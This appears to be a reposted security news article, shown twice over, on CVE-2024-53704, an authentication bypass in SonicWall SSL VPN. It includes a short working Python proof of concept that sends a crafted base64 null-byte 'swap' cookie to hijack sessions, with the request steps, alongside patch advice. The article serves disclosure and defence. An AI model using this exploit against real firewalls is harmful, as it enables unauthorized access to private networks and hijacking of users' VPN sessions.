Unpatched SonicWall Firewalls Vulnerability Actively Exploited To Hijack SSL VPN Sessions
- С сайта: Vulnerability(cybersecuritynews.com)
- Вернуться к списку новостей
С сайта: Vulnerability(cybersecuritynews.com)
A critical vulnerability in SonicWall firewalls, identified as CVE-2024-53704, has been actively exploited by attackers to hijack SSL VPN sessions.
This vulnerability affects SonicOS versions 7.1.x (7.1.1-7058 and older), 7.1.2-7019, and 8.0.0-8035.
The exploit allows a remote attacker to bypass authentication and take control of active SSL VPN client sessions without any credentials.
BishopFox experts noted that the vulnerability lies in the processing of Base64-encoded session cookies within the SSL VPN authentication mechanism.
An incorrect implementation of an authentication algorithm allows attackers to bypass authentication by manipulating these cookies.
Specifically, the getSslvpnSessionFromCookie function is vulnerable due to its handling of null characters in base64-encoded strings.
.webp)
Comparison logic (Source – BishopFox)
import base64, requests, urllib3, warnings warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
# Payload creation: Base64-encode 32 null characters payload = base64.b64encode(b"\x00" * 32).decode()
# Exploit script to hijack SSL VPN sessions resp = requests.get( "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=", cookies={"swap": payload}, verify=False )
print(resp.headers) print(resp.text)
Exploitation Process
The exploitation of CVE-2024-53704 presents severe security implications, as attackers can gain unauthorized access to private networks, view Virtual Office bookmarks, obtain client configuration profiles, and forcibly terminate active sessions.
While detecting this exploitation proves challenging due to the attack’s nature, organizations may implement custom logging configurations to help identify suspicious activities.
SonicWall addressed this vulnerability by releasing critical security patches on January 7, 2025, and organizations are strongly encouraged to apply these updates without delay.
The patched firewalls are designed to automatically reject any exploitation attempts.
So, it’s crucial to maintain robust security measures and implement timely patches, especially as threat actors continue to target vulnerabilities in network infrastructure.
#Cyber_Security_News #Vulnerability #cyber_security_news #vulnerability
Оригинальная версия на сайте:
Unpatched SonicWall Firewalls Vulnerability Actively Exploited To Hijack SSL VPN Sessions
Author: Tushar Subhra DuttaA critical vulnerability in SonicWall firewalls, identified as CVE-2024-53704, has been actively exploited by attackers to hijack SSL VPN sessions.
This vulnerability affects SonicOS versions 7.1.x (7.1.1-7058 and older), 7.1.2-7019, and 8.0.0-8035.
The exploit allows a remote attacker to bypass authentication and take control of active SSL VPN client sessions without any credentials.
BishopFox experts noted that the vulnerability lies in the processing of Base64-encoded session cookies within the SSL VPN authentication mechanism.
An incorrect implementation of an authentication algorithm allows attackers to bypass authentication by manipulating these cookies.
Specifically, the getSslvpnSessionFromCookie function is vulnerable due to its handling of null characters in base64-encoded strings.
Comparison logic (Source – BishopFox)import base64, requests, urllib3, warnings warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
# Payload creation: Base64-encode 32 null characters payload = base64.b64encode(b"\x00" * 32).decode()
# Exploit script to hijack SSL VPN sessions resp = requests.get( "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=", cookies={"swap": payload}, verify=False )
print(resp.headers) print(resp.text)
Exploitation Process
- Initial Login : An attacker sends a POST request to /cgi-bin/userLogin with a username, password, domain, and login=true.
- Swap Cookie : The server responds with a Set-Cookie header containing a base64-encoded swap cookie.
- Session Hijacking : The attacker sends a GET request to /cgi-bin/sslvpnclient?launchplatform= with the crafted swap cookie (base64-encoded null characters) to bypass authentication.
The exploitation of CVE-2024-53704 presents severe security implications, as attackers can gain unauthorized access to private networks, view Virtual Office bookmarks, obtain client configuration profiles, and forcibly terminate active sessions.
While detecting this exploitation proves challenging due to the attack’s nature, organizations may implement custom logging configurations to help identify suspicious activities.
SonicWall addressed this vulnerability by releasing critical security patches on January 7, 2025, and organizations are strongly encouraged to apply these updates without delay.
The patched firewalls are designed to automatically reject any exploitation attempts.
So, it’s crucial to maintain robust security measures and implement timely patches, especially as threat actors continue to target vulnerabilities in network infrastructure.
#Cyber_Security_News #Vulnerability #cyber_security_news #vulnerability
Оригинальная версия на сайте:
